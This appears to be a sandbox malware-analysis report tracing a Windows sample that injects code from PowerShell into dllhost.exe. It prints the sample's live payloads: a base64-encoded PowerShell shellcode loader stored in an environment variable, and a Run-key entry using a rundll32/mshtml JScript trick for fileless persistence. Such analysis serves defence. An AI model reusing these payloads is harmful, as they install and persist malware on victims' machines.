Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x765c49d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x767746ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x767748ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExA, address_out = 0x767714b3 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 1
Fn
System (6)
+
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (88)
+
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 80
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\5p5NrGJn0jS HALPmcxz True 1
Fn
Get Environment String name = a True 2
Fn
Get Environment String name = a, result_out = iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJdExWSU5sOUFDTCtQT2tEN2RMRkkxVUdTQXp5V1k3U3daek00dEtDSXN5Tzg1MkFvdk9oY2wwRll0OUNJdHlESUhIQkJFQUFBUDNpM29FQS9qenBBKzNTd2IvUmZTRHdpZzVUZlJ5ell0d1BBUHdpNDZBQUFBQWczd0JEQUIwU1kxOEFReUxEd1BJVWY5VjRJbEY1SVhBZEN1TFh3UURYZmpySG9zRGhjQjVCUSszd09zSGkwMzRqVVFJQWxEL2RlVC9WZkNKQTRQREJJTTdBSFhkaTBYNGc4Y1VnejhBZGJ1TGpxUUFBQUNKVGVDTGpxQUFBQUNMMkN0ZU5BUElnMlgwQU9zMmkxWGdPVlgwY3pXTlZ2alI2blFpalhrSWlWWHdEN2NYWm9YU2RBeUI0djhQQUFBRDBBTVJBUnFEeHdML1RmQjE1QUYxOUFQT2kzRUVoZloxdzR0SVBJdE1DQ2hxQUdvQi8zVUlBOGovMGVzQ004QmZYbHZKd2hBQVUxVldNL1pYT1RVNGtFQUFkUXYvRldnd1FBQ2pPSkJBQUlzZERERkFBTDA0a0VBQVZmL1RhZzR6MGxuMzhZdjZSM1FaVmYvVE05SnFHVm4zOFl0RUpCU0F3bUdJRkFaR08vZHk1NHRFSkJSZnhnUUdBRjVkVzhJRUFGV0w3TGdBRUFBQTZOZ0pBQUJUVm9zMUJERkFBRmN6Mi85MUVQOTFDUDhWdURCQUFJdjRoZjkwU290RkVJMUlBWW9RUUlUU2Rma3J3UVBIYUFBUUFBQlFqWVVBOFAvL1VQL1dpMFVJSzhjRFJReFEvM1VVVi8vVy8zVU1qWVVBOFAvL1VQOTFDUDhWQURGQUFEUGJnOFFrUSt1a1gxNkx3MXZKd2hBQVZZdnNnZXhNQkFBQVZsY3ovMWRYdmdRQkFBQldqWVcwKy8vL1VQOTFDRmYvRlRneFFBQ0Z3QStJcVFBQUFHbzRqVVhJVjFESFJjUThBQUFBNkNFSkFBQ0R4QXlOaGJ6OS8vOVFWdjhWUERCQUFQOTFDUDhWc0RCQUFGQ05oYno5Ly85US94VzBNRUFBVjQyRnZQMy8vMUNOaGJUNy8vOVEveFZBTUVBQWhjQjBWWTJGdlAzLy80bEYxSTFGeEZESFJjaEFBQUFBeDBYWVJETkFBUDhWcERCQUFJWEFkQmhvd0NjSkFQOTEvUDhWUkRCQUFQOTEvUDhWaURCQUFFZUxOWVF3UUFDTmhiVDcvLzlRLzlhTmhiejkvLzlRLzlhTHgxOWV5Y0lFQUZXTDdJUGsrSUhzeEFzQUFGTldWN25mQVFBQXZtZ3pRQUNOdkNSUUJBQUE4NlV6MjFPSlhDUWtwUDhWTERGQUFPaEg5Ly8vaVVRa0VQOFZhREJBQUtNRWkwQUFqWVFrUUFFQUFGRG8rUDMvLzFCbzZEcEFBTDU5QndBQVZvMkVKRndFQUFCUTZEcisvLytOaENSQUFRQUFVT2pTL2YvL1VHajRPa0FBVm8yRUpGd0VBQUJRNkJuKy8vK05oQ1JBQVFBQVVPaXgvZi8vVUdnSU8wQUFWbzJFSkZ3RUFBQlE2UGo5Ly8rTmhDUkFBUUFBVU9pUS9mLy9VR2dZTzBBQVZvMkVKRndFQUFCUTZOZjkvLytOaENSQUFRQUFVT2h2L2YvL1VHZ29PMEFBVm8yRUpGd0VBQUJRNkxiOS8vOXFCR2dBTUFBQWFBUTdBQUJUaVIwd2tFQUEveFY0TUVBQWkvQ0pkQ1FrTy9NUGhMOEZBQUJva0FBQUFJMkVKTEFBQUFCVFVNZUVKTFFBQUFDVUFBQUE2RkFIQUFDTnZnUVJBQUNEeEF5K0FHRkFBTGtBS2dBQTg2U0xmQ1FrYUFBQkFBQ05od1FRQUFCb0FHQkFBRkRIQlRDUVFBQUJBQUFBL3hVRU1VQUFpMFFrTUw1TkYwQUF1UUFRQUFEenBJUEVETDRFT3dBQVZvbXdBQkFBQU9oLzl2Ly9pVVFrR0kxNEFZb0lRRHJMZGZscUJDdkhhQUF3QUFDTnVIMEhBQUJYVS84VmVEQkFBRmVOakNSVUJBQUFVVkNKUkNRWS94VUVNVUFBZzhRTS8zUWtHR2c0TzBBQVYvOTBKQmpveFB6Ly8yb0tqWVFrUkFFQUFGQlcveFg4TUVBQWc4UU1qWVFrUUFFQUFGQm9TRHRBQUZmL2RDUVk2Sm44Ly8rTFJDUU1qWEFCaWdoQU9zdDEr True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #4: dllhost.exe
(Host: 120, Network: 3)
+
Information Value
ID #4
File Name c:\windows\syswow64\dllhost.exe
Command Line C:\Windows\syswow64\dllhost.exe
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
+
Information Value
PID 0xa94
Parent PID 0xa58 (c:\windows\syswow64\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A98
0x A9C
0x AA0
0x AA4
0x AAC
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000060000 0x00060000 0x00063fff Private Memory Readable, Writable, Executable True True False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000000e0000 0x000e0000 0x0011ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True True False
windowsshell.manifest 0x00130000 0x00130fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False
  • Region Actions
index.dat 0x00150000 0x0015bfff Memory Mapped File Readable, Writable True False False
  • Region Actions
index.dat 0x00160000 0x00167fff Memory Mapped File Readable, Writable True False False
  • Region Actions
index.dat 0x00170000 0x0017ffff Memory Mapped File Readable, Writable True False False
  • Region Actions
dllhost.exe 0x00190000 0x00194fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00000000001a0000 0x001a0000 0x0026ffff Private Memory Readable, Writable True True False
private_0x00000000001a0000 0x001a0000 0x0020ffff Private Memory Readable, Writable True True False
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x002affff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0034ffff Private Memory Readable, Writable True True False
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True True False
private_0x0000000000350000 0x00350000 0x0039ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x003affff Private Memory Readable, Writable True True False
private_0x00000000003c0000 0x003c0000 0x003fffff Private Memory Readable, Writable True True False
private_0x0000000000410000 0x00410000 0x0048ffff Private Memory Readable, Writable True True False
private_0x0000000000490000 0x00490000 0x004cffff Private Memory Readable, Writable True True False
pagefile_0x00000000004d0000 0x004d0000 0x005aefff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000005f0000 0x005f0000 0x006effff Private Memory Readable, Writable True True False
pagefile_0x00000000006f0000 0x006f0000 0x00877fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x00000000008c0000 0x008c0000 0x008cffff Private Memory Readable, Writable True True False
pagefile_0x00000000008d0000 0x008d0000 0x00a50fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000a60000 0x00a60000 0x01e5ffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001e60000 0x01e60000 0x0418cfff Private Memory Readable, Writable, Executable True False False
  • Region Actions
sortdefault.nls 0x04190000 0x0445efff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000004490000 0x04490000 0x044cffff Private Memory Readable, Writable True True False
private_0x00000000044e0000 0x044e0000 0x0451ffff Private Memory Readable, Writable True True False
private_0x00000000045e0000 0x045e0000 0x0461ffff Private Memory Readable, Writable True True False
private_0x0000000004620000 0x04620000 0x047affff Private Memory Readable, Writable True True False
private_0x0000000004660000 0x04660000 0x0469ffff Private Memory Readable, Writable True True False
private_0x0000000004770000 0x04770000 0x047affff Private Memory Readable, Writable True True False
private_0x00000000047b0000 0x047b0000 0x049affff Private Memory Readable, Writable True True False
private_0x00000000049b0000 0x049b0000 0x04baffff Private Memory Readable, Writable True True False
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
userenv.dll 0x74a50000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rasadhlp.dll 0x74c60000 0x74c65fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
fwpuclnt.dll 0x74c70000 0x74ca7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winrnr.dll 0x74cb0000 0x74cb7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pnrpnsp.dll 0x74cc0000 0x74cd1fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
napinsp.dll 0x74ce0000 0x74ceffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nlaapi.dll 0x74cf0000 0x74cfffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wshtcpip.dll 0x74d00000 0x74d04fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mswsock.dll 0x74d10000 0x74d4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
winnsi.dll 0x74d50000 0x74d56fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iphlpapi.dll 0x74d60000 0x74d7bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dnsapi.dll 0x74d80000 0x74dc3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ws2_32.dll 0x75380000 0x753b4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imagehlp.dll 0x75760000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x76470000 0x765a5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x768e0000 0x769fcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
nsi.dll 0x76bd0000 0x76bd5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x76be0000 0x76cd4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x76d30000 0x76f2afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x77530000 0x7753bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
  • Region Actions
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #3: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0xa88 address = 0x60000, size = 15108 True 1
Fn
Data
Modify Control Flow #3: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe 0xa88 os_tid = 0xa98, address = 0x60000 True 1
Fn
Host Behavior
Registry (12)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 3
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Fn
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = 35 True 1
Fn
Read Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ value_name = s, data = 0 False 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Fn
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms 